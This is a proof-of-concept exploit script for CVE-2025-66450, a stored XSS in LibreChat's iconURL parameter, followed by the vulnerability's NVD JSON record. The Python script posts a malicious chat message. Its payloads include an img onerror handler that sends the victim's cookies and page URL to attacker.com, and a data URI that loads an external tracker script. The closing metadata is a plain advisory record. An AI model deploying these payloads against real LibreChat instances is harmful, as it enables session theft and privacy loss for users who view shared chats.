CVE-2025-66450

import requests import json # CVE-2025-66450 PoC - LibreChat Stored XSS via iconURL # Target: LibreChat <= 0.8.0 TARGET_URL = "http://target-server/api/messages/send" ATTACKER_CONTROLLED_URL = "https://attacker.com/tracker.js" def exploit_stored_xss(target_url, attacker_url): """ Exploit Stored XSS in iconURL parameter This PoC demonstrates how to inject malicious tracker via iconURL """ # Malicious payload - steals victim info when chat is viewed malicious_payload = f''' <img src=x onerror=" fetch('https://attacker.com/log?cookie='+document.cookie+'&url='+window.location.href) "> ''' # Alternative payload using iconURL to load external script # This script will execute when victim views the chat payload_data = { "text": "Check out this chat!", "iconURL": f"data:text/html,<script src={attacker_url}></script>", "conversationId": " victim's conversation" } headers = { "Content-Type": "application/json", "Authorization": "Bearer <user_token>" } print(f"[*] Sending malicious payload to {target_url}") print(f"[*] Payload: {json.dumps(payload_data, indent=2)}") try: response = requests.post(target_url, json=payload_data, headers=headers) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Malicious chat created successfully") print("[*] When victim views this chat, tracker.js will be loaded") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": exploit_stored_xss(TARGET_URL, ATTACKER_CONTROLLED_URL)

{"cve": {"id": "CVE-2025-66450", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:56.153", "lastModified": "2025-12-15T17:57:48.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when a user posts a question, the iconURL parameter of the POST request can be modified by an attacker. The malicious code is then stored in the chat which can then be shared to other users. When sharing chats with a potentially malicious “tracker”, resources loaded can lead to loss of privacy for users who view the chat link that is sent to them. This issue is fixed in version 0.8.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.1", "matchCriteriaId": "9C781B65-3680-4762-9FEB-F404DDA1810C"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/commit/6fa94d3eb8f5779363226d10dccf8b01a735744c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}